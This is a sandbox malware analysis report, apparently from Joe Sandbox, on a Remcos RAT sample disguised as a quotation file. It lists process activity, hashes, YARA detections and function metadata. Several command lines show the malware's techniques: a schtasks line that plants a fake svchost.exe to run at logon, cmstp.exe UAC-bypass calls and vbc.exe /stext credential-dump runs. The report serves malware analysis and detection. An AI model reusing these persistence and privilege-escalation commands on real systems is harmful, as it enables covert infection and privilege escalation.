Commandline:	schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"'
Imagebase:	0x7ff69be40000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	13:13:26
Start date:	03/05/2024
Path:	C:\Windows\System32\timeout.exe
Wow64 process (32bit):	false
Commandline:	timeout 3
Imagebase:	0x7ff7f0cd0000
File size:	32'768 bytes
MD5 hash:	100065E21CFBBDE57CBA2838921F84D6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	13:13:28
Start date:	03/05/2024
Path:	C:\Users\user\AppData\Roaming\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Roaming\svchost.exe
Imagebase:	0x22705790000
File size:	948'209 bytes
MD5 hash:	C828227DB6D7BC08DD8E9B7313A0E770
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000009.00000002.1926724115.00000227078A2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 58%, ReversingLabs Detection: 49%, Virustotal, Browse
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	13:13:28
Start date:	03/05/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	13:13:29
Start date:	03/05/2024
Path:	C:\Users\user\AppData\Roaming\svchost.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Roaming\svchost.exe"
Imagebase:	0x1e1dbcb0000
File size:	948'209 bytes
MD5 hash:	C828227DB6D7BC08DD8E9B7313A0E770
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000B.00000002.1861743412.000001E1DDBDB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000B.00000002.1915952405.000001E1EDBA7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000B.00000002.1915952405.000001E1EDBA7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000B.00000002.1915952405.000001E1EDBA7000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	13:13:29
Start date:	03/05/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	13:13:33
Start date:	03/05/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe
Wow64 process (32bit):
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe"
Imagebase:
File size:	40'880 bytes
MD5 hash:	EF2DCDFF05E9679F8D0E2895D9A2E3BB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	14
Start time:	13:13:34
Start date:	03/05/2024
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):
Commandline:	"C:\Program Files (x86)\Internet Explorer\iexplore.exe"
Imagebase:
File size:	828'368 bytes
MD5 hash:	6F0F06D6AB125A99E43335427066A4A1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	15
Start time:	13:13:34
Start date:	03/05/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):
Commandline:	"C:\Windows\System32\svchost.exe"
Imagebase:
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000F.00000002.4008465388.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000F.00000002.4008465388.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000F.00000002.4008465388.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000F.00000002.4008465388.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000000F.00000002.4008465388.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	16
Start time:	13:13:38
Start date:	03/05/2024
Path:	C:\Users\user\AppData\Roaming\svchost.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Roaming\svchost.exe"
Imagebase:	0x172200f0000
File size:	948'209 bytes
MD5 hash:	C828227DB6D7BC08DD8E9B7313A0E770
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000010.00000002.1814204610.00000172222A2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000010.00000002.1814204610.0000017222011000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	13:13:38
Start date:	03/05/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	13:13:39
Start date:	03/05/2024
Path:	C:\Program Files (x86)\Windows Mail\wab.exe
Wow64 process (32bit):
Commandline:	"C:\Program Files (x86)\Windows Mail\wab.exe"
Imagebase:
File size:	516'608 bytes
MD5 hash:	251E51E2FEDCE8BB82763D39D631EF89
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	20
Start time:	13:13:39
Start date:	03/05/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
Imagebase:	0xf40000
File size:	2'625'616 bytes
MD5 hash:	0A7608DB01CAE07792CEA95E792AA866
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000014.00000002.4011395180.000000000053F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000014.00000002.4014378361.0000000000E9F000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000014.00000002.4011008508.0000000000507000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	21
Start time:	13:13:39
Start date:	03/05/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
Wow64 process (32bit):
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
Imagebase:
File size:	2'625'616 bytes
MD5 hash:	0A7608DB01CAE07792CEA95E792AA866
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	22
Start time:	13:13:39
Start date:	03/05/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k WerSvcGroup
Imagebase:	0x7ff67e6d0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	13:13:39
Start date:	03/05/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
Wow64 process (32bit):
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
Imagebase:
File size:	2'625'616 bytes
MD5 hash:	0A7608DB01CAE07792CEA95E792AA866
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	24
Start time:	13:13:39
Start date:	03/05/2024
Path:	C:\Windows\System32\WerFault.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WerFault.exe -pss -s 444 -p 5864 -ip 5864
Imagebase:	0x7ff751e40000
File size:	570'736 bytes
MD5 hash:	FD27D9F6D02763BDE32511B5DF7FF7A0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	13:13:39
Start date:	03/05/2024
Path:	C:\Windows\System32\WerFault.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WerFault.exe -u -p 5864 -s 1120
Imagebase:	0x7ff751e40000
File size:	570'736 bytes
MD5 hash:	FD27D9F6D02763BDE32511B5DF7FF7A0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	13:13:40
Start date:	03/05/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
Imagebase:	0xea0000
File size:	2'141'552 bytes
MD5 hash:	EB80BB1CA9B9C7F516FF69AFCFD75B7D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001A.00000002.1750545324.000000000561A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	13:13:41
Start date:	03/05/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
Wow64 process (32bit):
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
Imagebase:
File size:	2'141'552 bytes
MD5 hash:	EB80BB1CA9B9C7F516FF69AFCFD75B7D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	28
Start time:	13:13:41
Start date:	03/05/2024
Path:	C:\Windows\System32\WerFault.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WerFault.exe -pss -s 460 -p 2772 -ip 2772
Imagebase:	0x7ff751e40000
File size:	570'736 bytes
MD5 hash:	FD27D9F6D02763BDE32511B5DF7FF7A0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	13:13:41
Start date:	03/05/2024
Path:	C:\Windows\System32\WerFault.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WerFault.exe -u -p 2772 -s 1072
Imagebase:	0x7ff751e40000
File size:	570'736 bytes
MD5 hash:	FD27D9F6D02763BDE32511B5DF7FF7A0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	13:13:43
Start date:	03/05/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
Imagebase:	0x7ff67e6d0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	13:13:44
Start date:	03/05/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe /stext "C:\Users\user\AppData\Local\Temp\lmxgukvurszvufgxilvllznhpy"
Imagebase:	0xf40000
File size:	2'625'616 bytes
MD5 hash:	0A7608DB01CAE07792CEA95E792AA866
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	13:13:44
Start date:	03/05/2024
Path:	C:\Windows\System32\cmstp.exe
Wow64 process (32bit):	false
Commandline:	"c:\windows\system32\cmstp.exe" /au C:\windows\temp\macatsxh.inf
Imagebase:	0x7ff6ca070000
File size:	98'304 bytes
MD5 hash:	4CC43FE4D397FF79FA69F397E016DF52
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000021.00000003.1770928480.000002453D6A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000021.00000003.1770848664.000002453D6A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000021.00000003.1770876326.000002453D6A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000021.00000003.1770951803.000002453D6A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000021.00000003.1770441759.000002453D690000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000021.00000003.1770666779.000002453D690000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000021.00000003.1770897911.000002453D6A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000021.00000003.1770638691.000002453D690000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	13:13:44
Start date:	03/05/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe /stext "C:\Users\user\AppData\Local\Temp\nglqvdfonaraelcbsvimoeayympwa"
Imagebase:	0xf40000
File size:	2'625'616 bytes
MD5 hash:	0A7608DB01CAE07792CEA95E792AA866
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	13:13:44
Start date:	03/05/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
Imagebase:	0x7ff67e6d0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	37
Start time:	13:13:44
Start date:	03/05/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe /stext "C:\Users\user\AppData\Local\Temp\nglqvdfonaraelcbsvimoeayympwa"
Imagebase:	0xf40000
File size:	2'625'616 bytes
MD5 hash:	0A7608DB01CAE07792CEA95E792AA866
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	13:13:48
Start date:	03/05/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe /stext "C:\Users\user\AppData\Local\Temp\yiqjvvqpbijnhrqfbgcgyquhzthfbppay"
Imagebase:	0xf40000
File size:	2'625'616 bytes
MD5 hash:	0A7608DB01CAE07792CEA95E792AA866
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	13:13:47
Start date:	03/05/2024
Path:	C:\Users\user\AppData\Roaming\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Roaming\svchost.exe
Imagebase:	0x1d0e83a0000
File size:	948'209 bytes
MD5 hash:	C828227DB6D7BC08DD8E9B7313A0E770
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000028.00000002.1955305299.000001D080302000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	13:13:47
Start date:	03/05/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	13:13:47
Start date:	03/05/2024
Path:	C:\Users\user\AppData\Roaming\svchost.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Roaming\svchost.exe"
Imagebase:	0x17f2cec0000
File size:	948'209 bytes
MD5 hash:	C828227DB6D7BC08DD8E9B7313A0E770
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000002A.00000002.1926881023.0000017F2EDDB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000002A.00000002.1926881023.0000017F2EE1D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	43
Start time:	13:13:47
Start date:	03/05/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	44
Start time:	13:13:53
Start date:	03/05/2024
Path:	C:\Windows\System32\cmstp.exe
Wow64 process (32bit):	false
Commandline:	"c:\windows\system32\cmstp.exe" /au C:\windows\temp\54bmrp0l.inf
Imagebase:	0x7ff6ca070000
File size:	98'304 bytes
MD5 hash:	4CC43FE4D397FF79FA69F397E016DF52
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	45
Start time:	13:13:54
Start date:	03/05/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe"
Imagebase:	0x500000
File size:	144'344 bytes
MD5 hash:	417D6EA61C097F8DF6FEF2A57F9692DF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000002D.00000002.1869716098.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000002D.00000002.1869716098.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000002D.00000002.1869716098.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000002D.00000002.1869716098.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000002D.00000002.1869716098.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000002D.00000002.1916087250.0000000004E87000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	46
Start time:	13:13:54
Start date:	03/05/2024
Path:	C:\Windows\System32\WerFault.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WerFault.exe -pss -s 536 -p 6908 -ip 6908
Imagebase:	0x7ff751e40000
File size:	570'736 bytes
MD5 hash:	FD27D9F6D02763BDE32511B5DF7FF7A0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	48
Start time:	13:13:57
Start date:	03/05/2024
Path:	C:\Windows\System32\WerFault.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WerFault.exe -u -p 6908 -s 1076
Imagebase:	0x7ff751e40000
File size:	570'736 bytes
MD5 hash:	FD27D9F6D02763BDE32511B5DF7FF7A0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	50
Start time:	13:13:58
Start date:	03/05/2024
Path:	C:\Windows\System32\cmstp.exe
Wow64 process (32bit):	false
Commandline:	"c:\windows\system32\cmstp.exe" /au C:\windows\temp\xrlumlnf.inf
Imagebase:	0x7ff6ca070000
File size:	98'304 bytes
MD5 hash:	4CC43FE4D397FF79FA69F397E016DF52
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	51
Start time:	13:14:05
Start date:	03/05/2024
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /IM cmstp.exe /F
Imagebase:	0x7ff70d2d0000
File size:	101'376 bytes
MD5 hash:	A599D3B2FAFBDE4C1A6D7D0F839451C7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	52
Start time:	13:14:06
Start date:	03/05/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	11.2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	6
Total number of Limit Nodes:	0

Executed Functions

Function 00007FFB4AF9146F Relevance: 4.2, Strings: 3, Instructions: 490
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

.M_^, xrefs: 00007FFB4AF91601
EJ, xrefs: 00007FFB4AF9179B
"c/, xrefs: 00007FFB4AF91556

Memory Dump Source

Source File: 00000000.00000002.1601507997.00007FFB4AF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffb4af90000_QUOTATION#30810.jbxd

Similarity

API ID:
String ID: "c/$.M_^$EJ
API String ID: 0-2264714594
Opcode ID: 952a6fa681fcaf581f369d23d9dd0d814354232d6dc670ebb36eae72c05a877c
Instruction ID: d55062c84fa6b286745cfabad11939d60ffb046836ac95d5f6909f93cef7110d
Opcode Fuzzy Hash: 952a6fa681fcaf581f369d23d9dd0d814354232d6dc670ebb36eae72c05a877c
Instruction Fuzzy Hash: BBD127A3B0F99A4BE701BE7CE8551E4BB58EF8237171803FBD589CB087DD2568468394

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFB4AF9BEE1 Relevance: 2.6, Strings: 1, Instructions: 1366
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

#uL, xrefs: 00007FFB4AF9C9D7

Memory Dump Source

Source File: 00000000.00000002.1601507997.00007FFB4AF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffb4af90000_QUOTATION#30810.jbxd

Similarity

API ID:
String ID: #uL
API String ID: 0-1014397383
Opcode ID: 078f29ec6569972aa3318a401a62c410444d86c02d8e135c514f4c2428ef0e5f
Instruction ID: 22f6b9426b8c7cdb8d53f3b4a5457150ca377c7605e3267a6135dc0aecf3be5c
Opcode Fuzzy Hash: 078f29ec6569972aa3318a401a62c410444d86c02d8e135c514f4c2428ef0e5f
Instruction Fuzzy Hash: 3EA213B191CA498FE359EF38C4A44A5B7F5FF95301B2445FED08AC72E6EA35A842C740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFB4AF9EE79 Relevance: 1.9, Strings: 1, Instructions: 668
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

OL_H, xrefs: 00007FFB4AF9EE8E

Memory Dump Source

Source File: 00000000.00000002.1601507997.00007FFB4AF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffb4af90000_QUOTATION#30810.jbxd

Similarity

API ID:
String ID: OL_H
API String ID: 0-3734465514
Opcode ID: cfe54d595fad8882095e071fd212a52858b2b38ee82e597444bcd85eddcc0914
Instruction ID: 37960301f149beda599124789813f5e5a94f6027b7465afcfa134df033912245
Opcode Fuzzy Hash: cfe54d595fad8882095e071fd212a52858b2b38ee82e597444bcd85eddcc0914
Instruction Fuzzy Hash: A6223471A1CB464FD319EF38C4910A1B7E6FBD5305B2486BEE486C72D6EA34E846C781

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFB4AF94398 Relevance: 1.8, Strings: 1, Instructions: 536
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

fish, xrefs: 00007FFB4AF944C0

Memory Dump Source

Source File: 00000000.00000002.1601507997.00007FFB4AF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffb4af90000_QUOTATION#30810.jbxd

Similarity

API ID:
